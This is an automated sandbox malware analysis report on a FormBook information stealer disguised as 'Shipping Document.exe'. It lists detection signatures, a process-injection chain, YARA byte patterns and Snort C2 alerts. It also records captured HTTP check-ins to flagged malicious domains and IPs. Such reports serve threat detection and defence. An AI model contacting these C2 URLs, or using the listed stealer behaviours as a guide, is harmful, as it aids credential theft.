Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Shipping Document.exe

Overview

General Information

Sample name:Shipping Document.exe
Analysis ID:1447908
MD5:d6e393603c46c4152ea7603ff047af86
SHA1:664cfe9fa1b0df9d616d4158bb0b5742e62a1756
SHA256:a70008d95ba3e813cd35c1c663aa46c3cf6c95eeaeccbfbdeb18597daec36647
Tags:exeFormbook
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected FormBook
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Found direct / indirect Syscall (likely to bypass EDR)
Initial sample is a PE file and has a suspicious name
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (date check)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • Shipping Document.exe (PID: 2520 cmdline: "C:\Users\user\Desktop\Shipping Document.exe" MD5: D6E393603C46C4152EA7603FF047AF86)
    • svchost.exe (PID: 3820 cmdline: "C:\Users\user\Desktop\Shipping Document.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • tvtoHmZUTcBKRIVpHYXPXI.exe (PID: 2144 cmdline: "C:\Program Files (x86)\oRaHmvfHWYZzFEfwbxQgAeJyPjGSHxrfxbuOcRfPhgphNnWIjpjKGasKyUEFMfgPzJomMLDtClGs\tvtoHmZUTcBKRIVpHYXPXI.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • certreq.exe (PID: 2444 cmdline: "C:\Windows\SysWOW64\certreq.exe" MD5: A18A70A77AAC4E9D59CFD65C969AF959)
          • tvtoHmZUTcBKRIVpHYXPXI.exe (PID: 2780 cmdline: "C:\Program Files (x86)\oRaHmvfHWYZzFEfwbxQgAeJyPjGSHxrfxbuOcRfPhgphNnWIjpjKGasKyUEFMfgPzJomMLDtClGs\tvtoHmZUTcBKRIVpHYXPXI.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 3652 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
00000004.00000002.3984304736.0000000003650000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000004.00000002.3984304736.0000000003650000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
    • 0x2a500:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0x13b6f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
    00000002.00000002.1669970223.0000000000400000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000002.00000002.1669970223.0000000000400000.00000040.80000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x2d7c3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0x16e32:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      00000004.00000002.3980970277.00000000033E0000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        Click to see the 11 entries
        SourceRuleDescriptionAuthorStrings
        2.2.svchost.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          2.2.svchost.exe.400000.0.unpackWindows_Trojan_Formbook_1112e116unknownunknown
          • 0x2c9c3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
          • 0x16032:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
          2.2.svchost.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            2.2.svchost.exe.400000.0.raw.unpackWindows_Trojan_Formbook_1112e116unknownunknown
            • 0x2d7c3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
            • 0x16e32:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

            System Summary

            barindex
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\Shipping Document.exe", CommandLine: "C:\Users\user\Desktop\Shipping Document.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\Shipping Document.exe", ParentImage: C:\Users\user\Desktop\Shipping Document.exe, ParentProcessId: 2520, ParentProcessName: Shipping Document.exe, ProcessCommandLine: "C:\Users\user\Desktop\Shipping Document.exe", ProcessId: 3820, ProcessName: svchost.exe
            Source: Process startedAuthor: vburov: Data: Command: "C:\Users\user\Desktop\Shipping Document.exe", CommandLine: "C:\Users\user\Desktop\Shipping Document.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\Shipping Document.exe", ParentImage: C:\Users\user\Desktop\Shipping Document.exe, ParentProcessId: 2520, ParentProcessName: Shipping Document.exe, ProcessCommandLine: "C:\Users\user\Desktop\Shipping Document.exe", ProcessId: 3820, ProcessName: svchost.exe
            Timestamp:05/27/24-12:22:10.319360
            SID:2855465
            Source Port:63193
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/27/24-12:23:14.615156
            SID:2855465
            Source Port:63209
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/27/24-12:21:56.331665
            SID:2855465
            Source Port:63189
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/27/24-12:21:29.439800
            SID:2855465
            Source Port:63181
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/27/24-12:22:24.036463
            SID:2855465
            Source Port:63197
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/27/24-12:23:42.952231
            SID:2855465
            Source Port:63217
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/27/24-12:21:14.380304
            SID:2855465
            Source Port:63177
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/27/24-12:20:08.835239
            SID:2855465
            Source Port:63160
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/27/24-12:23:00.502659
            SID:2855465
            Source Port:63205
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/27/24-12:20:32.726865
            SID:2855465
            Source Port:63164
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/27/24-12:20:59.368425
            SID:2855465
            Source Port:63173
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/27/24-12:23:29.267343
            SID:2855465
            Source Port:63213
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/27/24-12:20:46.049229
            SID:2855465
            Source Port:63169
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/27/24-12:21:42.893457
            SID:2855465
            Source Port:63185
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/27/24-12:22:46.698255
            SID:2855465
            Source Port:63201
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Source: http://www.auronhouse.com/opfh/Avira URL Cloud: Label: malware
            Source: http://www.drapples.club/opfh/Avira URL Cloud: Label: phishing
            Source: http://www.auronhouse.com/opfh/?R40L6=7Wua4PKYKhchrV0dSktA0JoUSva1JJLdwMIZklFmHGZRtcxczCNUWysLgxYx/pnfXqYHMYy3waVzlkYFJZPX15RsNLA3Qz23CQiAilW87ptstt/8e1muReOX5esxW5+HpDKanOvxLVS9&b2PX=hZXl7VFPKl04Avira URL Cloud: Label: malware
            Source: http://www.ukscan.co.uk/opfh/?R40L6=psz/lQNJHky0FOXgYDlRBO31u/UTIg5Z7J5/vGqoP1XE+s8tr2C67qXiCqgsbd7PhBjn/lOTwSnvTpIgb8gb5UyiwGIV81pY4xefKgdN39cek8LArgSLQN3X1wfTB8wzGIcdBGhl9zAd&b2PX=hZXl7VFPKl04Avira URL Cloud: Label: malware
            Source: http://www.ukscan.co.uk/opfh/Avira URL Cloud: Label: malware
            Source: http://www.pricekaboom.com/opfh/Avira URL Cloud: Label: malware
            Source: http://www.pricekaboom.com/opfh/?R40L6=i+7S41wOBsHRtkSR5z49LNLl1g14jCJSsH67VhPHZINUfWrbgsYvxB6MwE8qgxdKQETWoz01bCGz4LwvUs/3BJoUBrhuAwUbkATTebp7Ts+JQM1y8oWpV0wDLMDnSIORGtRyV6PjEdP1&b2PX=hZXl7VFPKl04Avira URL Cloud: Label: malware
            Source: https://www.auronhouse.com/opfh/?R40L6=7Wua4PKYKhchrV0dSktA0JoUSva1JJLdwMIZklFmHGZRtcxczCNUWysLgxYx/Avira URL Cloud: Label: malware
            Source: http://www.batchscraper.com/opfh/?R40L6=AGl44rzTw2dIC+2fJHSMY5CagqpMx9ss+xDw2ILHnY0V4XytCPUwKd/QF5kiL9X2gIgUWxZ6E+yGLjvXAstM4MAyIKs/O1HO2djzFZ+svgnMXhmr1Gwb4CXwLPvvhByMEXNfrkehm32q&b2PX=hZXl7VFPKl04Avira URL Cloud: Label: malware
            Source: http://www.annahaywardva.co.uk/opfh/?R40L6=rBeI5JL4SdE8nFW9pIUfBkvOLwnHMU9O9JCyLdspFwofGsVtAi0tgWeg3zHJ2XnwxoW6lgl8FdELwhlchXf8iZDZl79NZT9hgeyhr+mr8upFSzDJKwHDStxLaliRPfjpA6FezmrpjIYZ&b2PX=hZXl7VFPKl04Avira URL Cloud: Label: malware
            Source: http://www.annahaywardva.co.uk/opfh/Avira URL Cloud: Label: malware
            Source: http://www.drapples.club/opfh/?R40L6=ItiWO1iWeFtHa8hPek+OcHyLbef7ZgLT8jCYd//+XcZZdI8PxrJa9smp+DWZYnBxcEEGiLIUcWsNzCqVKSWt292FhOiPAibVi2DXZfZ1Bcb5xD1zZxmn+AopE2U6Sy6WzAqAlkUlqKwq&b2PX=hZXl7VFPKl04Avira URL Cloud: Label: phishing
            Source: www.auronhouse.comVirustotal: Detection: 8%Perma Link
            Source: http://www.auronhouse.com/opfh/Virustotal: Detection: 11%Perma Link
            Source: Shipping Document.exeReversingLabs: Detection: 54%
            Source: Shipping Document.exeVirustotal: Detection: 36%Perma Link
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000004.00000002.3984304736.0000000003650000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.1669970223.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.3980970277.00000000033E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.1670104693.00000000027B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.3987001681.0000000005650000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.3977610628.0000000002F20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.3984522245.0000000005800000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.1670907930.0000000005B50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
            Source: Shipping Document.exeJoe Sandbox ML: detected
            Source: Shipping Document.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: Binary string: certreq.pdb source: svchost.exe, 00000002.00000003.1621959172.0000000002A86000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1621830012.0000000002A1A000.00000004.00000020.00020000.00000000.sdmp, tvtoHmZUTcBKRIVpHYXPXI.exe, 00000003.00000003.1591967021.00000000012BB000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: tvtoHmZUTcBKRIVpHYXPXI.exe, 00000003.00000002.3978300136.000000000010E000.00000002.00000001.01000000.00000004.sdmp, tvtoHmZUTcBKRIVpHYXPXI.exe, 00000006.00000002.3978327377.000000000010E000.00000002.00000001.01000000.00000004.sdmp
            Source: Binary string: wntdll.pdbUGP source: Shipping Document.exe, 00000001.00000003.1511356261.0000000003CC0000.00000004.00001000.00020000.00000000.sdmp, Shipping Document.exe, 00000001.00000003.1507043382.0000000003AD0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1670469944.000000000319E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1670469944.0000000003000000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1558086826.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1555960380.0000000002C00000.00000004.00000020.00020000.00000000.sdmp, certreq.exe, 00000004.00000002.3984920272.00000000056AE000.00000040.00001000.00020000.00000000.sdmp, certreq.exe, 00000004.00000002.3984920272.0000000005510000.00000040.00001000.00020000.00000000.sdmp, certreq.exe, 00000004.00000003.1669727415.00000000051BA000.00000004.00000020.00020000.00000000.sdmp, certreq.exe, 00000004.00000003.1674793663.0000000005361000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: Shipping Document.exe, 00000001.00000003.1511356261.0000000003CC0000.00000004.00001000.00020000.00000000.sdmp, Shipping Document.exe, 00000001.00000003.1507043382.0000000003AD0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000002.1670469944.000000000319E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1670469944.0000000003000000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1558086826.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1555960380.0000000002C00000.00000004.00000020.00020000.00000000.sdmp, certreq.exe, certreq.exe, 00000004.00000002.3984920272.00000000056AE000.00000040.00001000.00020000.00000000.sdmp, certreq.exe, 00000004.00000002.3984920272.0000000005510000.00000040.00001000.00020000.00000000.sdmp, certreq.exe, 00000004.00000003.1669727415.00000000051BA000.00000004.00000020.00020000.00000000.sdmp, certreq.exe, 00000004.00000003.1674793663.0000000005361000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: svchost.pdb source: certreq.exe, 00000004.00000002.3981081238.0000000003471000.00000004.00000020.00020000.00000000.sdmp, certreq.exe, 00000004.00000002.3986547187.0000000005B3C000.00000004.10000000.00040000.00000000.sdmp, tvtoHmZUTcBKRIVpHYXPXI.exe, 00000006.00000002.3984748061.000000000321C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.1970178698.000000001694C000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: svchost.pdbUGP source: certreq.exe, 00000004.00000002.3981081238.0000000003471000.00000004.00000020.00020000.00000000.sdmp, certreq.exe, 00000004.00000002.3986547187.0000000005B3C000.00000004.10000000.00040000.00000000.sdmp, tvtoHmZUTcBKRIVpHYXPXI.exe, 00000006.00000002.3984748061.000000000321C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.1970178698.000000001694C000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: certreq.pdbGCTL source: svchost.exe, 00000002.00000003.1621959172.0000000002A86000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1621830012.0000000002A1A000.00000004.00000020.00020000.00000000.sdmp, tvtoHmZUTcBKRIVpHYXPXI.exe, 00000003.00000003.1591967021.00000000012BB000.00000004.00000020.00020000.00000000.sdmp
            Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 1_2_01024696 GetFileAttributesW,FindFirstFileW,FindClose,1_2_01024696
            Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 1_2_0102C93C FindFirstFileW,FindClose,1_2_0102C93C
            Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 1_2_0102C9C7 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,1_2_0102C9C7
            Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 1_2_0102F35D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,1_2_0102F35D
            Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 1_2_0102F200 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,1_2_0102F200
            Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 1_2_0102F65E FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,1_2_0102F65E
            Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 1_2_01023A2B FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,1_2_01023A2B
            Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 1_2_01023D4E FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,1_2_01023D4E
            Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 1_2_0102BF27 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,1_2_0102BF27
            Source: C:\Windows\SysWOW64\certreq.exeCode function: 4_2_02F3B8A0 FindFirstFileW,FindNextFileW,FindClose,4_2_02F3B8A0
            Source: C:\Windows\SysWOW64\certreq.exeCode function: 4x nop then xor eax, eax4_2_02F29330
            Source: C:\Windows\SysWOW64\certreq.exeCode function: 4x nop then pop edi4_2_02F2DB25

            Networking

            barindex
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.7:63160 -> 172.67.190.203:80
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.7:63164 -> 142.250.186.51:80
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.7:63169 -> 3.33.130.190:80
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.7:63173 -> 199.59.243.225:80
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.7:63177 -> 212.227.172.253:80
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.7:63181 -> 199.59.243.225:80
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.7:63185 -> 213.171.195.105:80
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.7:63189 -> 203.161.43.227:80
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.7:63193 -> 160.251.148.118:80
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.7:63197 -> 199.59.243.225:80
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.7:63201 -> 185.31.240.240:80
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.7:63205 -> 199.59.243.225:80
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.7:63209 -> 3.33.130.190:80
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.7:63213 -> 91.195.240.92:80
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.7:63217 -> 38.47.207.149:80
            Source: DNS query: www.ziontool.xyz
            Source: DNS query: www.autonomyai.xyz
            Source: Joe Sandbox ViewIP Address: 185.31.240.240 185.31.240.240
            Source: Joe Sandbox ViewIP Address: 203.161.43.227 203.161.43.227
            Source: Joe Sandbox ViewASN Name: SEDO-ASDE SEDO-ASDE
            Source: Joe Sandbox ViewASN Name: ZONEZoneMediaOUEE ZONEZoneMediaOUEE
            Source: Joe Sandbox ViewASN Name: VNPT-AS-VNVNPTCorpVN VNPT-AS-VNVNPTCorpVN
            Source: Joe Sandbox ViewASN Name: INTERQGMOInternetIncJP INTERQGMOInternetIncJP
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 1_2_010325E2 InternetReadFile,InternetQueryDataAvailable,InternetReadFile,1_2_010325E2
            Source: global trafficHTTP traffic detected: GET /opfh/?R40L6=AGl44rzTw2dIC+2fJHSMY5CagqpMx9ss+xDw2ILHnY0V4XytCPUwKd/QF5kiL9X2gIgUWxZ6E+yGLjvXAstM4MAyIKs/O1HO2djzFZ+svgnMXhmr1Gwb4CXwLPvvhByMEXNfrkehm32q&b2PX=hZXl7VFPKl04 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.5Host: www.batchscraper.comConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0
            Source: global trafficHTTP traffic detected: GET /opfh/?R40L6=7Wua4PKYKhchrV0dSktA0JoUSva1JJLdwMIZklFmHGZRtcxczCNUWysLgxYx/pnfXqYHMYy3waVzlkYFJZPX15RsNLA3Qz23CQiAilW87ptstt/8e1muReOX5esxW5+HpDKanOvxLVS9&b2PX=hZXl7VFPKl04 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.5Host: www.auronhouse.comConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0
            Source: global trafficHTTP traffic detected: GET /opfh/?R40L6=psz/lQNJHky0FOXgYDlRBO31u/UTIg5Z7J5/vGqoP1XE+s8tr2C67qXiCqgsbd7PhBjn/lOTwSnvTpIgb8gb5UyiwGIV81pY4xefKgdN39cek8LArgSLQN3X1wfTB8wzGIcdBGhl9zAd&b2PX=hZXl7VFPKl04 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.5Host: www.ukscan.co.ukConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0
            Source: global trafficHTTP traffic detected: GET /opfh/?R40L6=ZzDSVGEFmA6bbFgWUPABJOqYyGy556P6SvdRpmz0pldrPkLsuzUuLHkKP8ebqy61OUsJ3I6Wp1cSjumXpsr68z/GSQBLa7X+Wj1CzMiNU/mDF53obi6xM6x1cOBV2RrPtvioQYdy1WMq&b2PX=hZXl7VFPKl04 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.5Host: www.swordshoop.caConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0
            Source: global trafficHTTP traffic detected: GET /opfh/?R40L6=gmtcV0/XP16HFJIc+kOspKC5zFAVyKp1GVqpqKlYYBexGLFCqPGdfyxYaar+lftgkYb5tsdy9JRJ3lwsUywzZFsvuukx19EGSpFqL58eVbDWPjA2ZTqEF6w8W0EPQt4fJd0o3pJS2XVx&b2PX=hZXl7VFPKl04 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.5Host: www.fruitique.co.ukConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0
            Source: global trafficHTTP traffic detected: GET /opfh/?R40L6=PC685LTb06jHOCK4vGHbFQZ2xkI1XLFU2OtxALHCeHx3vCzda7v1dhtYxdz770kbIy0AX5udiNTwR8fzRWvU0kdzv6lB2tOiWMAiJN+HcPhB483U4R/s/Re5ANHairphm1/7Mj/vaUsb&b2PX=hZXl7VFPKl04 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.5Host: www.gamemaster.atConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0
            Source: global trafficHTTP traffic detected: GET /opfh/?R40L6=rBeI5JL4SdE8nFW9pIUfBkvOLwnHMU9O9JCyLdspFwofGsVtAi0tgWeg3zHJ2XnwxoW6lgl8FdELwhlchXf8iZDZl79NZT9hgeyhr+mr8upFSzDJKwHDStxLaliRPfjpA6FezmrpjIYZ&b2PX=hZXl7VFPKl04 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.5Host: www.annahaywardva.co.ukConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0
